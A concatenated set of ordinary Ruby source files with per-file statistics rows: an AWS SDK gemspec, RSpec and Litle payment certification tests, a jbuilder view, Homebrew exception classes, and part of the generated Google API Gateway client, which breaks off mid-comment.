Gem::Specification.new do |spec|
spec.name = 'aws-sdk-apigateway'
spec.version = File.read(File.expand_path('../VERSION', __FILE__)).strip
spec.summary = 'AWS SDK for Ruby - Amazon API Gateway'
spec.description = 'Official AWS Ruby gem for Amazon API Gateway. This gem is part of the AWS SDK for Ruby.'
spec.author = 'Amazon Web Services'
spec.homepage = 'https://github.com/aws/aws-sdk-ruby'
spec.license = 'Apache-2.0'
spec.email = ['[email protected]']
spec.require_paths = ['lib']
spec.files = Dir['lib/**/*.rb']
spec.metadata = {
'source_code_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/master/gems/aws-sdk-apigateway',
'changelog_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/master/gems/aws-sdk-apigateway/CHANGELOG.md'
}
spec.add_dependency('aws-sdk-core', '~> 3', '>= 3.48.2')
spec.add_dependency('aws-sigv4', '~> 1.1')
end
| 38.4 | 112 | 0.663194 |
287ea0a769943f4890937d46d421e88886855894 | 4,005 | require 'spec_helper'
describe HdfsEntryPresenter, :type => :view do
let(:hdfs_data_source) { hdfs_data_sources(:hadoop) }
let(:options) {{}}
let(:presenter) { HdfsEntryPresenter.new(entry, view, options) }
describe "#to_hash" do
let(:hash) { presenter.to_hash }
shared_examples_for :rendering_activities do
let(:options) { {activity_stream: true} }
it 'renders no tags' do
hash.should_not have_key(:tags)
end
end
context "for a directory" do
let(:entry) do
hdfs_data_source.hdfs_entries.create!({
:path => "/data2",
:modified_at => "2010-10-20 10:11:12",
:size => '10',
:is_directory => 'true',
:content_count => 1,
:hdfs_data_source => hdfs_data_source
}, :without_protection => true)
end
before do
mock(entry).ancestors { [{:name => "foo", :id => 1}] }
stub(entry).entries { [] }
end
it "includes the fields" do
hash[:id].should == entry.id
hash[:name].should == "data2"
hash[:path].should == "/"
hash[:last_updated_stamp].should == "2010-10-20T10:11:12Z"
hash[:size].should == 10
hash[:is_deleted].should be_false
hash[:is_dir].should be_true
hash[:count].should be(1)
hash[:tags].should be_an Array
hash[:hdfs_data_source][:id].should == hdfs_data_source.id
hash[:hdfs_data_source][:name].should == hdfs_data_source.name
hash[:ancestors].should == [{:name => "foo", :id => 1}]
hash.should_not have_key(:contents)
hash.should_not have_key(:entries)
end
context "when deep option is specified" do
let(:options) {{:deep => true}}
it "includes entries" do
hash[:id].should == entry.id
hash[:entries].should == []
end
end
it_behaves_like :rendering_activities
end
context "for a file" do
let(:entry) do
hdfs_data_source.hdfs_entries.create!({
:path => "/data.file",
:modified_at => "2010-10-20 10:11:12",
:size => '10',
:is_directory => 'false',
:content_count => 1,
:hdfs_data_source => hdfs_data_source
}, :without_protection => true)
end
before do
mock(entry).ancestors { [{:name => "foo", :id => 1}] }
stub(entry).contents { "Content" }
end
it "includes the fields" do
hash[:id].should == entry.id
hash[:name].should == "data.file"
hash[:path].should == "/"
hash[:last_updated_stamp].should == "2010-10-20T10:11:12Z"
hash[:size].should == 10
hash[:is_deleted].should be_false
hash[:is_dir].should be_false
hash[:hdfs_data_source][:id].should == hdfs_data_source.id
hash[:hdfs_data_source][:name].should == hdfs_data_source.name
hash[:ancestors].should == [{:name => "foo", :id => 1}]
hash.should_not have_key(:contents)
hash.should_not have_key(:entries)
end
context "when deep option is specified" do
let(:options) {{:deep => true}}
it "includes contents" do
hash[:id].should == entry.id
hash[:contents].should == "Content"
end
end
it_behaves_like :rendering_activities
end
end
describe "complete_json?" do
context "with a file" do
let(:entry) { hdfs_entries(:hdfs_file) }
it "is true" do
presenter.complete_json?.should be_true
end
end
context "with a directory" do
let(:entry) { hdfs_entries(:directory) }
context "when deep is not specified" do
it "is not true" do
presenter.complete_json?.should_not be_true
end
end
context "when deep is specified" do
let(:options) { {:deep => true} }
it "is true" do
presenter.complete_json?.should be_true
end
end
end
end
end
| 29.021739 | 70 | 0.571036 |
38e4c161e604238f4f86176e027e77bf25c2e1c0 | 295 | json.extract! @comment, :id
json.body h(@comment.body)
json.created_at l(@comment.created_at)
json.user do
json.display_name @comment.user.display_name
json.image do
json.thumbnail do
json.src @comment.user.image.thumbnail.url
end
end
json.url user_path(@comment.user)
end
| 22.692308 | 48 | 0.738983 |
ac3611ac005f3aacddc67963a6862114d3a0c6a9 | 9,802 | require File.expand_path("../../../lib/LitleOnline",__FILE__)
require 'test/unit'
module LitleOnline
class Litle_certTest5 < Test::Unit::TestCase
@@merchant_hash = {
'reportGroup'=>'Planets',
'url'=> 'https://payments.vantivprelive.com/vap/communicator/online',
'id'=>'test'
}
# def test_50
# customer_hash = {
# 'orderId' => '50',
# 'accountNumber' => '4457119922390123'
# }
# hash = customer_hash.merge(@@merchant_hash)
# token_response = LitleOnlineRequest.new.register_token_request(hash)
# assert_equal('445711', token_response.registerTokenResponse.bin)
# assert_equal('VI', token_response.registerTokenResponse['type'])
# assert_equal('801', token_response.registerTokenResponse.response)
# assert_equal('1111222233330123', token_response.registerTokenResponse.litleToken)
# assert_equal('Account number was successfully registered', token_response.registerTokenResponse.message)
# end
def test_51
customer_hash = {
'orderId' => '51',
'accountNumber' => '4457119999999999'
}
hash = customer_hash.merge(@@merchant_hash)
token_response = LitleOnlineRequest.new.register_token_request(hash)
assert_equal('820', token_response.registerTokenResponse.response)
assert_equal('Credit card number was invalid', token_response.registerTokenResponse.message)
end
def test_52
customer_hash = {
'orderId' => '52',
'accountNumber' => '4457119922390123'
}
hash = customer_hash.merge(@@merchant_hash)
token_response = LitleOnlineRequest.new.register_token_request(hash)
assert_equal('445711', token_response.registerTokenResponse.bin)
assert_equal('VI', token_response.registerTokenResponse['type'])
assert_equal('802', token_response.registerTokenResponse.response)
cardString = "" + token_response.registerTokenResponse.litleToken
assert_equal('0123', cardString[12..15])
assert_equal('Account number was previously registered', token_response.registerTokenResponse.message)
end
# def test_53
# customer_hash = {
# 'orderId' => '53',
# 'echeckForToken'=>{'accNum'=>'1099999998','routingNum'=>'114567895'}
# }
# hash = customer_hash.merge(@@merchant_hash)
# token_response = LitleOnlineRequest.new.register_token_request(hash)
# assert_equal('EC', token_response.registerTokenResponse['type'])
# assert_equal('998', token_response.registerTokenResponse.eCheckAccountSuffix)
# assert_equal('801', token_response.registerTokenResponse.response)
# assert_equal('Account number was successfully registered', token_response.registerTokenResponse.message)
# assert_equal('111922223333000998', token_response.registerTokenResponse.litleToken)
# end
def test_54
customer_hash = {
'orderId' => '54',
'echeckForToken'=>{'accNum'=>'1022222102','routingNum'=>'1145_7895'}
}
hash = customer_hash.merge(@@merchant_hash)
token_response = LitleOnlineRequest.new.register_token_request(hash)
assert_equal('900', token_response.registerTokenResponse.response)
# assert_equal('Invalid bank routing number', token_response.registerTokenResponse.message)
end
# def test_55
# customer_hash = {
# 'orderId' => '55',
# 'amount' => '15000',
# 'orderSource' => 'ecommerce',
# 'card' => {'number' => '5435101234510196', 'expDate' => '1112', 'cardValidationNum' => '987', 'type' => 'MC'}
# }
# hash = customer_hash.merge(@@merchant_hash)
# token_response = LitleOnlineRequest.new.authorization(hash)
# assert_equal('000', token_response.authorizationResponse.response)
# assert_equal('Approved', token_response.authorizationResponse.message)
# assert_equal('801', token_response.authorizationResponse.tokenResponse.tokenResponseCode)
# assert_equal('Account number was successfully registered', token_response.authorizationResponse.tokenResponse.tokenMessage)
# assert_equal('MC', token_response.authorizationResponse.tokenResponse['type'])
# assert_equal('543510', token_response.authorizationResponse.tokenResponse.bin)
# end
def test_56
customer_hash = {
'orderId' => '56',
'amount' => '15000',
'orderSource' => 'ecommerce',
'card' => {'number' => '5435109999999999', 'expDate' => '1112', 'cardValidationNum' => '987', 'type' => 'MC'}
}
hash = customer_hash.merge(@@merchant_hash)
token_response = LitleOnlineRequest.new.authorization(hash)
assert_equal('301', token_response.authorizationResponse.response)
# assert_equal('Invalid account number', token_response.authorizationResponse.message)
end
def test_57
customer_hash = {
'orderId' => '57',
'amount' => '15000',
'orderSource' => 'ecommerce',
'card' => {'number' => '5435101234510196', 'expDate' => '1112', 'cardValidationNum' => '987', 'type' => 'MC'}
}
hash = customer_hash.merge(@@merchant_hash)
token_response = LitleOnlineRequest.new.authorization(hash)
assert_equal('000', token_response.authorizationResponse.response)
assert_equal('Approved', token_response.authorizationResponse.message)
assert_equal('802', token_response.authorizationResponse.tokenResponse.tokenResponseCode)
assert_equal('Account number was previously registered', token_response.authorizationResponse.tokenResponse.tokenMessage)
assert_equal('MC', token_response.authorizationResponse.tokenResponse['type'])
assert_equal('543510', token_response.authorizationResponse.tokenResponse.bin)
end
def test_59
customer_hash = {
'orderId' => '59',
'amount' => '15000',
'orderSource' => 'ecommerce',
'token' => {'litleToken' => '1111000100092332', 'expDate' => '1121'}
}
hash = customer_hash.merge(@@merchant_hash)
token_response = LitleOnlineRequest.new.authorization(hash)
assert_equal('822', token_response.authorizationResponse.response)
assert_equal('Token was not found', token_response.authorizationResponse.message)
end
def test_60
customer_hash = {
'orderId' => '60',
'amount' => '15000',
'orderSource' => 'ecommerce',
'token' => {'litleToken' => '1112000100000085', 'expDate' => '1121'}
}
hash = customer_hash.merge(@@merchant_hash)
token_response = LitleOnlineRequest.new.authorization(hash)
assert_equal('823', token_response.authorizationResponse.response)
assert_equal('Token was invalid', token_response.authorizationResponse.message)
end
# def test_61
# customer_hash = {
# 'orderId' => '61',
# 'amount' => '15000',
# 'orderSource' => 'ecommerce',
# 'billToAddress'=>{
# 'firstName' => 'Tom',
# 'lastName' => 'Black'},
# 'echeck' => {'accType' => 'Checking', 'accNum' => '1099999003', 'routingNum' => '114567895'}
# }
# hash = customer_hash.merge(@@merchant_hash)
# token_response = LitleOnlineRequest.new.echeck_sale(hash)
# assert_equal('801', token_response.echeckSalesResponse.tokenResponse.tokenResponseCode)
# assert_equal('Account number was successfully registered', token_response.echeckSalesResponse.tokenResponse.tokenMessage)
# assert_equal('EC', token_response.echeckSalesResponse.tokenResponse['type'])
# assert_equal('003', token_response.echeckSalesResponse.tokenResponse.eCheckAccountSuffix)
# assert_equal('111922223333444003', token_response.echeckSalesResponse.tokenResponse.litleToken)
# end
# def test_62
# customer_hash = {
# 'orderId' => '62',
# 'amount' => '15000',
# 'orderSource' => 'ecommerce',
# 'billToAddress'=>{
# 'firstName' => 'Tom',
# 'lastName' => 'Black'},
# 'echeck' => {'accType' => 'Checking', 'accNum' => '1099999999', 'routingNum' => '114567895'}
# }
# hash = customer_hash.merge(@@merchant_hash)
# token_response = LitleOnlineRequest.new.echeck_sale(hash)
# assert_equal('801', token_response.echeckSalesResponse.tokenResponse.tokenResponseCode)
# assert_equal('Account number was successfully registered', token_response.echeckSalesResponse.tokenResponse.tokenMessage)
# assert_equal('EC', token_response.echeckSalesResponse.tokenResponse['type'])
# assert_equal('999', token_response.echeckSalesResponse.tokenResponse.eCheckAccountSuffix)
# assert_equal('111922223333444999', token_response.echeckSalesResponse.tokenResponse.litleToken)
# end
# def test_63
# customer_hash = {
# 'orderId' => '63',
# 'amount' => '15000',
# 'orderSource' => 'ecommerce',
# 'billToAddress'=>{
# 'firstName' => 'Tom',
# 'lastName' => 'Black'},
# 'echeck' => {'accType' => 'Checking', 'accNum' => '1099999999', 'routingNum' => '214567892'}
# }
# hash = customer_hash.merge(@@merchant_hash)
# token_response = LitleOnlineRequest.new.echeck_sale(hash)
# assert_equal('801', token_response.echeckSalesResponse.tokenResponse.tokenResponseCode)
# assert_equal('Account number was successfully registered', token_response.echeckSalesResponse.tokenResponse.tokenMessage)
# assert_equal('EC', token_response.echeckSalesResponse.tokenResponse['type'])
# assert_equal('999', token_response.echeckSalesResponse.tokenResponse.eCheckAccountSuffix)
# assert_equal('111922223333555999', token_response.echeckSalesResponse.tokenResponse.litleToken)
# end
end
end | 47.352657 | 131 | 0.677311 |
f88b6fc571e69b8accd01b0a8dc0d36c174c5307 | 7,358 | class UsageError < RuntimeError; end
class FormulaUnspecifiedError < UsageError; end
class KegUnspecifiedError < UsageError; end
class MultipleVersionsInstalledError < RuntimeError
attr_reader :name
def initialize name
@name = name
super "#{name} has multiple installed versions"
end
end
class NotAKegError < RuntimeError; end
class NoSuchKegError < RuntimeError
attr_reader :name
def initialize name
@name = name
super "No such keg: #{HOMEBREW_CELLAR}/#{name}"
end
end
class FormulaValidationError < StandardError
attr_reader :attr
def initialize(attr, value)
@attr = attr
msg = "invalid attribute: #{attr}"
msg << " (#{value.inspect})" unless value.empty?
super msg
end
end
class FormulaSpecificationError < StandardError; end
class FormulaUnavailableError < RuntimeError
attr_reader :name
attr_accessor :dependent
def dependent_s
"(dependency of #{dependent})" if dependent and dependent != name
end
def to_s
if name =~ HOMEBREW_TAP_FORMULA_REGEX then <<-EOS.undent
No available formula for #$3 #{dependent_s}
Please tap it and then try again: brew tap #$1/#$2
EOS
else
"No available formula for #{name} #{dependent_s}"
end
end
def initialize name
@name = name
end
end
class OperationInProgressError < RuntimeError
def initialize name
message = <<-EOS.undent
Operation already in progress for #{name}
Another active Homebrew process is already using #{name}.
Please wait for it to finish or terminate it to continue.
EOS
super message
end
end
module Homebrew
class InstallationError < RuntimeError
attr_reader :formula
def initialize formula, message=""
super message
@formula = formula
end
end
end
class CannotInstallFormulaError < RuntimeError; end
class FormulaAlreadyInstalledError < RuntimeError; end
class FormulaInstallationAlreadyAttemptedError < Homebrew::InstallationError
def message
"Formula installation already attempted: #{formula}"
end
end
class UnsatisfiedDependencyError < Homebrew::InstallationError
def initialize(f, dep)
super f, <<-EOS.undent
#{f} dependency #{dep} not installed with:
#{dep.missing_options * ', '}
EOS
end
end
class UnsatisfiedRequirements < Homebrew::InstallationError
attr_reader :reqs
def initialize formula, reqs
@reqs = reqs
message = (reqs.length == 1) \
? "An unsatisfied requirement failed this build." \
: "Unsatisifed requirements failed this build."
super formula, message
end
end
class IncompatibleCxxStdlibs < Homebrew::InstallationError
def initialize(f, dep, wrong, right)
super f, <<-EOS.undent
#{f} dependency #{dep} was built with a different C++ standard
library (#{wrong.type_string} from #{wrong.compiler}). This could cause problems at runtime.
EOS
end
end
class FormulaConflictError < Homebrew::InstallationError
attr_reader :f, :conflicts
def initialize(f, conflicts)
@f = f
@conflicts = conflicts
super f, message
end
def conflict_message(conflict)
message = []
message << " #{conflict.name}"
message << ": because #{conflict.reason}" if conflict.reason
message.join
end
def message
message = []
message << "Cannot install #{f.name} because conflicting formulae are installed.\n"
message.concat conflicts.map { |c| conflict_message(c) } << ""
message << <<-EOS.undent
Please `brew unlink #{conflicts.map(&:name)*' '}` before continuing.
Unlinking removes a formula's symlinks from #{HOMEBREW_PREFIX}. You can
link the formula again after the install finishes. You can --force this
install, but the build may fail or cause obscure side-effects in the
resulting software.
EOS
message.join("\n")
end
end
class BuildError < Homebrew::InstallationError
attr_reader :exit_status, :command, :env
def initialize formula, cmd, args, es
@command = cmd
@env = ENV.to_hash
@exit_status = es.exitstatus rescue 1
args = args.map{ |arg| arg.to_s.gsub " ", "\\ " }.join(" ")
super formula, "Failed executing: #{command} #{args}"
end
def was_running_configure?
@command == './configure'
end
def issues
@issues ||= fetch_issues
end
def fetch_issues
GitHub.issues_for_formula(formula.name)
rescue GitHub::RateLimitExceededError => e
opoo e.message
[]
end
def dump
if not ARGV.verbose?
puts
puts "#{Tty.red}READ THIS#{Tty.reset}: #{Tty.em}#{ISSUES_URL}#{Tty.reset}"
if formula.tap?
user, repo = formula.tap.split '/'
tap_issues_url = "https://github.com/#{user}/homebrew-#{repo}/issues"
puts "If reporting this issue please do so at (not Homebrew/homebrew):"
puts " #{tap_issues_url}"
end
else
require 'cmd/--config'
require 'cmd/--env'
unless formula.core_formula?
ohai "Formula"
puts "Tap: #{formula.tap}"
puts "Path: #{formula.path.realpath}"
end
ohai "Configuration"
Homebrew.dump_build_config
ohai "ENV"
Homebrew.dump_build_env(env)
puts
onoe "#{formula.name} did not build"
unless (logs = Dir["#{HOMEBREW_LOGS}/#{formula}/*"]).empty?
puts "Logs:"
puts logs.map{|fn| " #{fn}"}.join("\n")
end
end
puts
unless RUBY_VERSION < "1.8.6" || issues.empty?
puts "These open issues may also help:"
puts issues.map{ |i| "#{i['title']} (#{i['html_url']})" }.join("\n")
end
end
end
# raised by CompilerSelector if the formula fails with all of
# the compilers available on the user's system
class CompilerSelectionError < Homebrew::InstallationError
def initialize f
super f, <<-EOS.undent
#{f.name} cannot be built with any available compilers.
To install this formula, you may need to:
brew install apple-gcc42
EOS
end
end
# Raised in Resource.fetch
class DownloadError < RuntimeError
def initialize(resource, e)
super <<-EOS.undent
Failed to download resource #{resource.download_name.inspect}
#{e.message}
EOS
end
end
# raised in CurlDownloadStrategy.fetch
class CurlDownloadStrategyError < RuntimeError; end
# raised by safe_system in utils.rb
class ErrorDuringExecution < RuntimeError; end
# raised by Pathname#verify_checksum when "expected" is nil or empty
class ChecksumMissingError < ArgumentError; end
# raised by Pathname#verify_checksum when verification fails
class ChecksumMismatchError < RuntimeError
attr_reader :expected, :hash_type
def initialize fn, expected, actual
@expected = expected
@hash_type = expected.hash_type.to_s.upcase
super <<-EOS.undent
#{@hash_type} mismatch
Expected: #{expected}
Actual: #{actual}
Archive: #{fn}
To retry an incomplete download, remove the file above.
EOS
end
end
class ResourceMissingError < ArgumentError
def initialize formula, resource
@formula = formula
@resource = resource
end
def to_s
"Formula #{@formula} does not define resource \"#{@resource}\"."
end
end
class DuplicateResourceError < ArgumentError
def initialize resource
@resource = resource
end
def to_s
"Resource \"#{@resource}\" defined more than once."
end
end
| 25.460208 | 96 | 0.682387 |
e9d23e72d2142865b1ea47e6eac15daeaadf17b8 | 50,894 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'date'
require 'google/apis/core/base_service'
require 'google/apis/core/json_representation'
require 'google/apis/core/hashable'
require 'google/apis/errors'
module Google
module Apis
module ApigatewayV1
# An API that can be served by one or more Gateways.
class ApigatewayApi
include Google::Apis::Core::Hashable
# Output only. Created time.
# Corresponds to the JSON property `createTime`
# @return [String]
attr_accessor :create_time
# Optional. Display name.
# Corresponds to the JSON property `displayName`
# @return [String]
attr_accessor :display_name
# Optional. Resource labels to represent user-provided metadata. Refer to cloud
# documentation on labels for more details. https://cloud.google.com/compute/
# docs/labeling-resources
# Corresponds to the JSON property `labels`
# @return [Hash<String,String>]
attr_accessor :labels
# Optional. Immutable. The name of a Google Managed Service ( https://cloud.
# google.com/service-infrastructure/docs/glossary#managed). If not specified, a
# new Service will automatically be created in the same project as this API.
# Corresponds to the JSON property `managedService`
# @return [String]
attr_accessor :managed_service
# Output only. Resource name of the API. Format: projects/`project`/locations/
# global/apis/`api`
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# Output only. State of the API.
# Corresponds to the JSON property `state`
# @return [String]
attr_accessor :state
# Output only. Updated time.
# Corresponds to the JSON property `updateTime`
# @return [String]
attr_accessor :update_time
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@create_time = args[:create_time] if args.key?(:create_time)
@display_name = args[:display_name] if args.key?(:display_name)
@labels = args[:labels] if args.key?(:labels)
@managed_service = args[:managed_service] if args.key?(:managed_service)
@name = args[:name] if args.key?(:name)
@state = args[:state] if args.key?(:state)
@update_time = args[:update_time] if args.key?(:update_time)
end
end
# An API Configuration is a combination of settings for both the Managed Service
# and Gateways serving this API Config.
class ApigatewayApiConfig
include Google::Apis::Core::Hashable
# Output only. Created time.
# Corresponds to the JSON property `createTime`
# @return [String]
attr_accessor :create_time
# Optional. Display name.
# Corresponds to the JSON property `displayName`
# @return [String]
attr_accessor :display_name
# Immutable. The Google Cloud IAM Service Account that Gateways serving this
# config should use to authenticate to other services. This may either be the
# Service Account's email (``ACCOUNT_ID`@`PROJECT`.iam.gserviceaccount.com`) or
# its full resource name (`projects/`PROJECT`/accounts/`UNIQUE_ID``). This is
# most often used when the service is a GCP resource such as a Cloud Run Service
# or an IAP-secured service.
# Corresponds to the JSON property `gatewayServiceAccount`
# @return [String]
attr_accessor :gateway_service_account
# Optional. gRPC service definition files. If specified, openapi_documents must
# not be included.
# Corresponds to the JSON property `grpcServices`
# @return [Array<Google::Apis::ApigatewayV1::ApigatewayApiConfigGrpcServiceDefinition>]
attr_accessor :grpc_services
# Optional. Resource labels to represent user-provided metadata. Refer to cloud
# documentation on labels for more details. https://cloud.google.com/compute/
# docs/labeling-resources
# Corresponds to the JSON property `labels`
# @return [Hash<String,String>]
attr_accessor :labels
# Optional. Service Configuration files. At least one must be included when
# using gRPC service definitions. See https://cloud.google.com/endpoints/docs/
# grpc/grpc-service-config#service_configuration_overview for the expected file
# contents. If multiple files are specified, the files are merged with the
# following rules: * All singular scalar fields are merged using "last one wins"
# semantics in the order of the files uploaded. * Repeated fields are
# concatenated. * Singular embedded messages are merged using these rules for
# nested fields.
# Corresponds to the JSON property `managedServiceConfigs`
# @return [Array<Google::Apis::ApigatewayV1::ApigatewayApiConfigFile>]
attr_accessor :managed_service_configs
# Output only. Resource name of the API Config. Format: projects/`project`/
# locations/global/apis/`api`/configs/`api_config`
# Corresponds to the JSON property `name`
# @return [String]
attr_accessor :name
# Optional. OpenAPI specification documents. If specified, grpc_services and
# managed_service_configs must not be included.
# Corresponds to the JSON property `openapiDocuments`
# @return [Array<Google::Apis::ApigatewayV1::ApigatewayApiConfigOpenApiDocument>]
attr_accessor :openapi_documents
# Output only. The ID of the associated Service Config ( https://cloud.google.
# com/service-infrastructure/docs/glossary#config).
# Corresponds to the JSON property `serviceConfigId`
# @return [String]
attr_accessor :service_config_id
# Output only. State of the API Config.
# Corresponds to the JSON property `state`
# @return [String]
attr_accessor :state
# Output only. Updated time.
# Corresponds to the JSON property `updateTime`
# @return [String]
attr_accessor :update_time
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@create_time = args[:create_time] if args.key?(:create_time)
@display_name = args[:display_name] if args.key?(:display_name)
@gateway_service_account = args[:gateway_service_account] if args.key?(:gateway_service_account)
@grpc_services = args[:grpc_services] if args.key?(:grpc_services)
@labels = args[:labels] if args.key?(:labels)
@managed_service_configs = args[:managed_service_configs] if args.key?(:managed_service_configs)
@name = args[:name] if args.key?(:name)
@openapi_documents = args[:openapi_documents] if args.key?(:openapi_documents)
@service_config_id = args[:service_config_id] if args.key?(:service_config_id)
@state = args[:state] if args.key?(:state)
@update_time = args[:update_time] if args.key?(:update_time)
end
end
# A lightweight description of a file.
class ApigatewayApiConfigFile
include Google::Apis::Core::Hashable
# The bytes that constitute the file.
# Corresponds to the JSON property `contents`
# NOTE: Values are automatically base64 encoded/decoded in the client library.
# @return [String]
attr_accessor :contents
# The file path (full or relative path). This is typically the path of the file
# when it is uploaded.
# Corresponds to the JSON property `path`
# @return [String]
attr_accessor :path
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@contents = args[:contents] if args.key?(:contents)
@path = args[:path] if args.key?(:path)
end
end
# A gRPC service definition.
class ApigatewayApiConfigGrpcServiceDefinition
include Google::Apis::Core::Hashable
# A lightweight description of a file.
# Corresponds to the JSON property `fileDescriptorSet`
# @return [Google::Apis::ApigatewayV1::ApigatewayApiConfigFile]
attr_accessor :file_descriptor_set
# Optional. Uncompiled proto files associated with the descriptor set, used for
# display purposes (server-side compilation is not supported). These should
# match the inputs to 'protoc' command used to generate file_descriptor_set.
# Corresponds to the JSON property `source`
# @return [Array<Google::Apis::ApigatewayV1::ApigatewayApiConfigFile>]
attr_accessor :source
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@file_descriptor_set = args[:file_descriptor_set] if args.key?(:file_descriptor_set)
@source = args[:source] if args.key?(:source)
end
end
# An OpenAPI Specification Document describing an API.
class ApigatewayApiConfigOpenApiDocument
include Google::Apis::Core::Hashable
# A lightweight description of a file.
# Corresponds to the JSON property `document`
# @return [Google::Apis::ApigatewayV1::ApigatewayApiConfigFile]
attr_accessor :document
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@document = args[:document] if args.key?(:document)
end
end
# Specifies the audit configuration for a service. The configuration determines
# which permission types are logged, and what identities, if any, are exempted
# from logging. An AuditConfig must have one or more AuditLogConfigs. If there
# are AuditConfigs for both `allServices` and a specific service, the union of
# the two AuditConfigs is used for that service: the log_types specified in each
# AuditConfig are enabled, and the exempted_members in each AuditLogConfig are
# exempted. Example Policy with multiple AuditConfigs: ` "audit_configs": [ ` "
# service": "allServices", "audit_log_configs": [ ` "log_type": "DATA_READ", "
# exempted_members": [ "user:[email protected]" ] `, ` "log_type": "DATA_WRITE" `,
# ` "log_type": "ADMIN_READ" ` ] `, ` "service": "sampleservice.googleapis.com",
# "audit_log_configs": [ ` "log_type": "DATA_READ" `, ` "log_type": "DATA_WRITE"
# , "exempted_members": [ "user:[email protected]" ] ` ] ` ] ` For sampleservice,
# this policy enables DATA_READ, DATA_WRITE and ADMIN_READ logging. It also
# exempts [email protected] from DATA_READ logging, and [email protected] from
# DATA_WRITE logging.
class ApigatewayAuditConfig
include Google::Apis::Core::Hashable
# The configuration for logging of each type of permission.
# Corresponds to the JSON property `auditLogConfigs`
# @return [Array<Google::Apis::ApigatewayV1::ApigatewayAuditLogConfig>]
attr_accessor :audit_log_configs
# Specifies a service that will be enabled for audit logging. For example, `
# storage.googleapis.com`, `cloudsql.googleapis.com`. `allServices` is a special
# value that covers all services.
# Corresponds to the JSON property `service`
# @return [String]
attr_accessor :service
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@audit_log_configs = args[:audit_log_configs] if args.key?(:audit_log_configs)
@service = args[:service] if args.key?(:service)
end
end
# Provides the configuration for logging a type of permissions. Example: ` "
# audit_log_configs": [ ` "log_type": "DATA_READ", "exempted_members": [ "user:
# [email protected]" ] `, ` "log_type": "DATA_WRITE" ` ] ` This enables '
# DATA_READ' and 'DATA_WRITE' logging, while exempting [email protected] from
# DATA_READ logging.
class ApigatewayAuditLogConfig
include Google::Apis::Core::Hashable
# Specifies the identities that do not cause logging for this type of permission.
# Follows the same format of Binding.members.
# Corresponds to the JSON property `exemptedMembers`
# @return [Array<String>]
attr_accessor :exempted_members
# The log type that this config enables.
# Corresponds to the JSON property `logType`
# @return [String]
attr_accessor :log_type
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@exempted_members = args[:exempted_members] if args.key?(:exempted_members)
@log_type = args[:log_type] if args.key?(:log_type)
end
end
# Associates `members` with a `role`.
class ApigatewayBinding
include Google::Apis::Core::Hashable
# Represents a textual expression in the Common Expression Language (CEL) syntax.
# CEL is a C-like expression language. The syntax and semantics of CEL are
# documented at https://github.com/google/cel-spec. Example (Comparison): title:
# "Summary size limit" description: "Determines if a summary is less than 100
# chars" expression: "document.summary.size() < 100" Example (Equality): title: "
# Requestor is owner" description: "Determines if requestor is the document
# owner" expression: "document.owner == request.auth.claims.email" Example (
# Logic): title: "Public documents" description: "Determine whether the document
# should be publicly visible" expression: "document.type != 'private' &&
# document.type != 'internal'" Example (Data Manipulation): title: "Notification
# string" description: "Create a notification string with a timestamp."
# expression: "'New message received at ' + string(document.create_time)" The
# exact variables and functions that may be referenced within an expression are
# determined by the service that evaluates it. See the service documentation for
# additional information.
# Corresponds to the JSON property `condition`
# @return [Google::Apis::ApigatewayV1::ApigatewayExpr]
attr_accessor :condition
# Specifies the identities requesting access for a Cloud Platform resource. `
# members` can have the following values: * `allUsers`: A special identifier
# that represents anyone who is on the internet; with or without a Google
# account. * `allAuthenticatedUsers`: A special identifier that represents
# anyone who is authenticated with a Google account or a service account. * `
# user:`emailid``: An email address that represents a specific Google account.
# For example, `[email protected]` . * `serviceAccount:`emailid``: An email
# address that represents a service account. For example, `my-other-app@appspot.
# gserviceaccount.com`. * `group:`emailid``: An email address that represents a
# Google group. For example, `[email protected]`. * `deleted:user:`emailid`?uid=
# `uniqueid``: An email address (plus unique identifier) representing a user
# that has been recently deleted. For example, `[email protected]?uid=
# 123456789012345678901`. If the user is recovered, this value reverts to `user:`
# emailid`` and the recovered user retains the role in the binding. * `deleted:
# serviceAccount:`emailid`?uid=`uniqueid``: An email address (plus unique
# identifier) representing a service account that has been recently deleted. For
# example, `[email protected]?uid=123456789012345678901`.
# If the service account is undeleted, this value reverts to `serviceAccount:`
# emailid`` and the undeleted service account retains the role in the binding. *
# `deleted:group:`emailid`?uid=`uniqueid``: An email address (plus unique
# identifier) representing a Google group that has been recently deleted. For
# example, `[email protected]?uid=123456789012345678901`. If the group is
# recovered, this value reverts to `group:`emailid`` and the recovered group
# retains the role in the binding. * `domain:`domain``: The G Suite domain (
# primary) that represents all the users of that domain. For example, `google.
# com` or `example.com`.
# Corresponds to the JSON property `members`
# @return [Array<String>]
attr_accessor :members
# Role that is assigned to `members`. For example, `roles/viewer`, `roles/editor`
# , or `roles/owner`.
# Corresponds to the JSON property `role`
# @return [String]
attr_accessor :role
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@condition = args[:condition] if args.key?(:condition)
@members = args[:members] if args.key?(:members)
@role = args[:role] if args.key?(:role)
end
end
# The request message for Operations.CancelOperation.
class ApigatewayCancelOperationRequest
include Google::Apis::Core::Hashable
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
end
end
# Represents a textual expression in the Common Expression Language (CEL) syntax.
# CEL is a C-like expression language. The syntax and semantics of CEL are
# documented at https://github.com/google/cel-spec. Example (Comparison): title:
# "Summary size limit" description: "Determines if a summary is less than 100
# chars" expression: "document.summary.size() < 100" Example (Equality): title: "
# Requestor is owner" description: "Determines if requestor is the document
